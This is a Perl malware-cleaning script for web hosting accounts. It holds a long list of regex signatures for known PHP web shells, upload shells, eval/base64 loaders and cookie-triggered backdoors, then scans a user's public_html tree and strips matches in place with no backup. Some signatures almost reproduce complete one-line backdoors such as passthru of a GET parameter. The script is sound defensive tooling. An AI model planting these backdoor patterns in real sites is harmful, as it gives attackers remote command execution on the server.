qr/<\?php \@array_diff_ukey\(\@array\(\(string\)\$_REQUEST\[\'password\'\]=>1\)\,\@array\(\(string\)stripslashes\(\$_REQUEST\[\'re_password\'\]\)=>2\)\,\$_REQUEST\[\'login\'\]\); \?>/is,
qr/<\?php\s+\@session_start\(\);.+?echo \'<font color=\"green\">Upload Success\.\.<\/font><br \/>\';.+?\(\(\$perms \& 0x0200\) \? \'T\' \: \'\-\'\)\);\s+return \$info;\s+\}\s+\?>/is,
qr/<center>\s+<\?php\s+error_reporting\(0\);\s+if\(isset\(\$_GET\[host\]\)\).+?\.php_uname\(\)\..+?\}else\{echo\"<b>\";\}\}\} \?>\s+<\/center>/is,
qr/<\?php\s+set_time_limit\(0\);.+?function exect\(\$cmd\) \{\s+if\(function_exists\(\'system\'\)\) \{ .+?eof\(\);\s+echo \'<\/a>\';\s+echo \'<\/div>\';\s+echo \'<\/div>\';\s+\?>/is,
qr/\#\!\/bin\/bash\s+\# Using ZeroShell V 1\.3.+?function miningblue\(\).+?ostcheck\s+fi/is,
qr/<\?php \$([A-z0-9_]{1,20})=\'.+?\$([A-z0-9_]{1,20})=\'.+?\'; \$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20})\(\'\'\, \'.+?\$([A-z0-9_]{1,20})\); \$([A-z0-9_]{1,20})\(\);/is,
qr/<\?php.+?=== SecuPress Backdoor User ===.+?<\/div>\s+\<\/footer>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\$a\[0\]=\'.+?\$a\[1\]=\'.+?\$a\[2\]=\'.+?eval\(trim\(base64_decode\(base64_decode\(\$co\)\)\)\); \?>/is,
qr/<\?php\s+\$GLOBALS\[\'\_\_ALFA\_\_\'\] = array\(\'user\' => \'deathphantom\'\, \/\/username.+?if \(\!function_exists\(\'b\' \. \'as\' \. \'e6\' \. \'4\_\' \. \'en\' \. \'co\' \. \'de\'\)\) \{.+?\'\); \?>/is,
qr/<\?php \/\*\*\* WebShellOrb 2\.6 - With PHP 7 \*\*\*\/ \$([A-z0-9_]{1,30})=file\(\_\_FILE\_\_\);eval\(base64_decode\(\"aWYo.+?\)\)\);\_\_halt\_compiler\(\);aWYo\Z/is,
qr/<\?php\s+session_start\(\);.+?<title>IndoXploit<\/title>.+?serverinfo\(\);\s+action\(\);\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<head>\s+<title>:: Res7ock Crew<\/title>.+?Res7ock Crew<\/font><\/td><\/table><\/div><\/center><\/body><\/html>/is,
qr/<\?php\s+\$O_O0__OO00=\'\';\s+\$O_O0_OO0_0=\(\".+?if\(\!function_exists\(\'str_ireplace\'\)\)\{function str_ireplace\(\$from\,\$to\,\$string\)\{return trim\(preg_replace\(\"\/\"\.addcslashes\(\$from.+?\[\"\\x4f\\x30\\x30\\x5f\\x5f\\x30\\x4f\\x4f\\x5f\\x4f\"\]\(\);\?>/is,
qr/<\!DOCTYPE HTML PUBLIC \"\-\/\/IETF\/\/DTD HTML 2\.0\/\/EN\"> <html><head> <title>404 Not Found<\/title> <\/head><body> <h1>Not Found<\/h1> <p>The requested URL \/error\.php was not found on this server\.<\/p> <\/body><\/html> <\?php \@preg_replace\(\"\/\[checksql\]\/e\"\,\$_POST\[\'date\'\]\,\"saft\"\); header\(\'HTTP\/1\.1 404 Not Found\'\); \?>/is,
qr/<\?php\s+\$c0000101101.+?\$c00100.+?\);\s+\?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'gz\'\. \'un\'\. \'co\'\. \'mp\'\. \'re\'\. \'ss\';\$([A-z0-9_]{1,20}) = \'ba\' \.\'se\' \.\'64\' \.\'_d\' \.\'ec\' \.\'od\' \.\'e\';\$([A-z0-9_]{1,20}) = \'imp\' \.\'lod\' \.\'e\';\$([A-z0-9_]{1,20}) = array\(.+?\); eval\( \$([A-z0-9_]{1,20}) \(\$([A-z0-9_]{1,20}) \(\$([A-z0-9_]{1,20}) \(\'\'\,\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = array\(\'.+?array\(\'b\' \,\'a\' \,\'s\' \,\'e\' \,\'6\' \,\'4\' \,\'\_\' \,\'d\' \,\'e\' \,\'c\' \,\'o\' \,\'d\' \,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'gzun\'\, \'comp\'\, \'ress\'\) ;\$([A-z0-9_]{1,20}) = \'im\'\.chr\(112\)\.\'l\'\.chr\(111\)\.\'\'\.chr\(100\)\.\'e\' ; \$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'\'\, \$([A-z0-9_]{1,20})\); \$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'\'\, \$([A-z0-9_]{1,20})\); eval \( \$([A-z0-9_]{1,20})\( \$([A-z0-9_]{1,20})\( \$([A-z0-9_]{1,20})\( \'\'\, \$([A-z0-9_]{1,20}) \) \) \) \) ; \?>/is,
qr/<\?php if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\/\*([A-z0-9_]{1,20})\*\/eval\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;exit;\}\?>/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{\/\*([A-z0-9_]{1,20})\*\/\$([A-z0-9_]{1,20})\/\*([A-z0-9_]{1,20})\*\/\=\/\*([A-z0-9_]{1,20})\*\/\"asser\"\.\"t\";\$([A-z0-9_]{1,20})=\$k\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\)\)\{\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\);exit;\}/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{eval\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php if \(isset\(\$\{\"_REQUE\"\.\"ST\"\}\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$([A-z0-9_]{1,20})=\"assert\";\$([A-z0-9_]{1,20})\(\$\{\"_REQUEST\"\}\[\'([A-z0-9_]{1,20})\'\]\);exit;\}/is,
qr/<\?php.+?function decrypt\(\$str\,\$pwd\)\{\$pwd=base64_encode\(\$pwd\);\$str=base64_decode\(.+?call_user_func\(\'action\' \. \$_POST\[\'a\'\]\);\s+\?>/is,
qr/<\!\-\- HTML And JavaScript \-\->.+?Rebels Mailer.+?<\/span>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+if\(isset\(\$_GET\[\"up\"\]\)\)\{echo\"<font color=\#FFFFFF>\[uname\]\"\.php_uname\(\)\.\"\[\/uname\]\";echo\"<br><font color=\#FFFFFF>\[dir\]\"\.getcwd\(\)\.\"\[\/dir\]\";echo\"<form method=post enctype=multipart\/form-data>\";echo\"<input type=file name=f><input name=v type=submit id=v value=up><br>\";if\(\$_POST\[\"v\"\]==up\)\{if\(\@copy\(\$_FILES\[\"f\"\]\[\"tmp_name\"\]\,\$_FILES\[\"f\"\]\[\"name\"\]\)\)\{echo\"<b>Success<\/b>\-\->\"\.\$_FILES\[\"f\"\]\[\"name\"\];\}else\{echo\"<b>Failed\";\}\}\}\s+\?>/is,
qr/<\?php\s+\@ini_set\(\'display_errors\', \'0\'\);.+?\$bad_agents = \'\~google.+?\@include\(\"\{\$eb\}\.\$algo\"\);\s+\}\s+\}\s+\?>/is,
qr/<\?php if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)die\(pi\(\)\*6\);\$GLOBALS\[\'.+?\)\)\);if\(isset\(\$_1\)\)\{\@eval\(\$_1\);exit\(\);\}\}/is,
qr/<\?php\s+extract\(\$_REQUEST\) \&\& \@\$except\(stripslashes\(\$internal\)\) \&\& exit; if\(\!class_exists\(\'Ratel\'\)\).+?\$ratel->init\(\$ruri,\$host,\$is_bot\);\}/is,
qr/<\?php\s+extract\(\$_REQUEST\) \&\& \@\$system\(stripslashes\(\$catch\)\) \&\& exit;/is,
qr/<\?php\s+extract\(\$_REQUEST\) \&\& \@\$pass\(stripslashes\(\$not\)\) \&\& exit; if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$([A-z0-9_]{1,20})=\/\*([A-z0-9_]{1,20})\*\/\"assert\";\$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20})\/\*([A-z0-9_]{1,20})\*\/\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$([A-z0-9_]{1,20})=\"assert\";\/\*([A-z0-9_]{1,20})\*\/\$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20})\/\*([A-z0-9_]{1,20})\*\/\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php\s+extract\(\$_REQUEST\) \&\& \@\$lock\(stripslashes\(\$request\)\) \&\& exit; if\(isset\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\)\)\{\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\);exit;\}/is,
qr/<\?php\s+extract\(\$_REQUEST\) \&\& \@\$request\(stripslashes\(\$catch\)\) \&\& exit; if\(\!class_exists\(\'Ratel\'\)\)\{.+?\$ratel->init\(\$ruri,\$host,\$is_bot\);\}/is,
qr/<\?php\s+extract\(\$_REQUEST\) \&\& \@\$internal\(stripslashes\(\$user\)\) \&\& exit;\s+if \(\!class_exists\(\'Ratel\'\)\) \{.+?\$ratel->init\(\$ruri, \$host, \$is_bot\);\s+\}\s+\?>/is,
qr/\@ini_set\(\'display_errors\', \'0\'\);\s+error_reporting\(0\);\s+\$skipme = false;\s+\$bad_agents = \'\~google.+?register_shutdown_function\(\'ob_end_flush\'\);\s+\}\s+\}\s+\?>/is,
qr/if\(isset\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\)\)\{\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\);exit;\}/is,
qr/<\?php.+?if\(\!function_exists\(.+?=base64_decode\(\$.+?=\(ord\(\$.+?\"\)\);\?>/is,
qr/<\?php\s+\$.+?eval\(base64_decode\(gzuncompress\(base64_decode\(\$.+?\)\)\)\);\?>/is,
qr/<\?php \$__FILE__=__FILE__;\$__X__=\'.+?\)\);unset\(\$__X__\);unset\(\$__FILE__\); \?>/is,
qr/<\?php \/\*\*\* WebShellOrb 2\.6 - With PHP 7 \*\*\*\/ \$.+?=file\(\_\_FILE\_\_\);eval\(base64_decode\(\"aWYo.+?\)\)\);\_\_halt_compiler\(\);aWYo.+?\+fwE=/is,
qr/<\?php\s+error_reporting\(0\);.+?Database Emails Extractor By SparkyDz.+?return \$result;\s+\}\s+\?>/is,
qr/<\?php passthru\(\$_GET\[\'cmd\'\]\); \?>/is,
qr/<\?php.+?\$url = \"\(B\)\/\(C\)\-\(A\)\.html\";.+?0=urldecode\(\"\%6.+?\)\);\s+\?>/is,
qr/<\?php if\(\$_GET\[\'l\'\]\)\{\@move_uploaded_file\(\$_FILES\[\'f\'\]\[\'tmp_name\'.+?<\/form>\'; \?>/is,
qr/<\?php if\(\$_GET\[\"\\x6c\"\]\)\{\@move_uploaded_file\(\$_FILES\[.+?<\/f\\x6frm>\"; \?>/is,
);
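# Declared empty; nothing in the code below reads it.
my @base64_decodes = (
);
# Report accumulators: filled during the scan (if at all), printed below.
my @file_list;
my %possible_list;

# $user is taken verbatim from $ARGV[0] and becomes part of the scan root.
# The scanner rewrites files under that root, so a value containing "/" or
# ".." would let the caller point it at a different tree. Accept a single
# path component only.
unless (defined $user && $user =~ /\A[A-Za-z0-9][A-Za-z0-9._-]*\z/) {
    die "invalid or missing account name";
}

my $start_dir = "/home/$user/public_html/";
# Drop the first "/cgi-bin" and "/lp-msh-scanner" component, if present,
# then cut everything from the last "/" on (removes the trailing slash).
$start_dir =~ s/\/cgi-bin//;
$start_dir =~ s/\/lp-msh-scanner//;
$start_dir = substr($start_dir, 0, rindex($start_dir, '/'));

dir($start_dir);

# NOTE(review): the response was declared text/html and the names printed
# here come from the scanned tree; if this output is rendered by a browser
# rather than read as plain text, they should be HTML-escaped first.
print "\n\n";
print 'Infected Files CLEANED (' . scalar(@file_list) . "):\n";
print "$_\n" for @file_list;

print "\n\n";
print 'Possibly Infected Files (' . scalar(keys(%possible_list)) . "):\n";
for my $key (keys %possible_list) {
    print "$key => $possible_list{$key}\n";
}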
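# Recursively scan one directory.
#
# Every text file (per -T) up to 1024000 bytes is slurped and tested against
# each signature in @regexen; on a match clean_file() is asked to strip the
# signature and rewrite the file. Progress is printed per file. Files whose
# signatures were all removed are appended to @file_list; files with a match
# that could not be cleaned are recorded in %possible_list.
#
# Parameters:
#   $start_dir - directory to scan (no trailing slash expected).
# Returns nothing.
sub dir {
    my ($start_dir) = @_;

    # Lexical handle and a single readdir: the original reopened a shared
    # bareword DIR handle three times per directory.
    my $dh;
    unless (opendir($dh, $start_dir)) {
        print "Skipping directory $start_dir: $! ";
        return;
    }
    my @entries = readdir($dh);
    closedir $dh;

    # Symlinks are skipped. The tree being scanned is, by assumption, under
    # an attacker's control: following a link would let the scan (and the
    # in-place rewrite) leave the account's directory, and a link pointing
    # at an ancestor would recurse without end.
    my @files   = grep { !(-l "$start_dir/$_") && -T "$start_dir/$_" } @entries;
    my @folders = grep { !(-l "$start_dir/$_") && -d "$start_dir/$_" } @entries;

    FILE:
    foreach my $file (sort @files) {
        next FILE if $file eq 'error_log';

        my $path = "$start_dir/$file";
        print "Scanning $path... ";

        unless (-r $path) {
            print " Skipping file, unable to read file\n";
            next FILE;
        }
        if ((-s $path) > 1024000) {
            print " Skipping file, over 1MB\n";
            next FILE;
        }

        my $fh;
        unless (open($fh, '<', $path)) {
            print " Unable to read file, $!\n";
            next FILE;
        }
        my $contents = do { local $/; <$fh> };
        close $fh;

        my $infected    = 0;
        my $all_cleaned = 1;
        foreach my $pattern (@regexen) {
            next unless $contents =~ /$pattern/;
            $infected = 1;
            # clean_file returns the contents with this signature stripped,
            # so later signatures are tested against the cleaned text.
            my $ok;
            ($contents, $ok) = clean_file($path, $contents, $pattern);
            $all_cleaned = 0 unless $ok;
        }

        if ($infected) {
            if ($all_cleaned) {
                # Listed once per file, and only when every removal worked;
                # the original pushed once per matching signature and also
                # when cleaning had failed.
                push @file_list, $path;
                print "Infected, Cleaned\n";
            }
            else {
                # Keep failed cleans visible in the end-of-run summary.
                $possible_list{$path} = 'known signature matched, cleaning failed';
                print "Infected, Cleaning failed\n";
            }
        }
        else {
            print "Not infected\n";
        }
    }

    foreach my $folder (sort @folders) {
        next if $folder eq '.' || $folder eq '..';
        dir("$start_dir/$folder");
    }
    return;
}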
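# Strip every occurrence of one signature from a file's contents and write
# the result back over the file.
#
# Parameters:
#   $file     - path of the file to rewrite.
#   $contents - the file's current contents, already read by the caller.
#   $pattern  - compiled signature (qr//) to remove.
# Returns ($contents, $cleaned): the contents after substitution, and 1 if
# the file was rewritten successfully, 0 otherwise.
#
# The file is overwritten in place and no copy of the original is kept, so
# a signature that matches legitimate code removes that code for good.
sub clean_file {
    my ($file, $contents, $pattern) = @_;

    # If the file contains a run of four newlines anywhere, every pair of
    # newlines in the whole file is collapsed to one before the removal.
    if ($contents =~ /\n{4}/) {
        $contents =~ s/\n\n/\n/g;
    }

    $contents =~ s/$pattern//g;

    # Removing matches can splice the surrounding text into a new match; if
    # the signature is still present, leave the file on disk untouched.
    return ($contents, 0) if $contents =~ /$pattern/;

    # Never write through a symlink: the target may lie outside the tree
    # being cleaned. (The check and the open are not atomic.)
    return ($contents, 0) if -l $file;

    my $fh;
    unless (open($fh, '>', $file)) {
        # The original ignored this failure and still reported success.
        warn "clean_file: cannot write $file: $!\n";
        return ($contents, 0);
    }
    my $written = print {$fh} $contents;
    # Buffered write errors only surface at close, so check it as well.
    my $closed = close $fh;

    return ($contents, ($written && $closed) ? 1 : 0);
}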
1;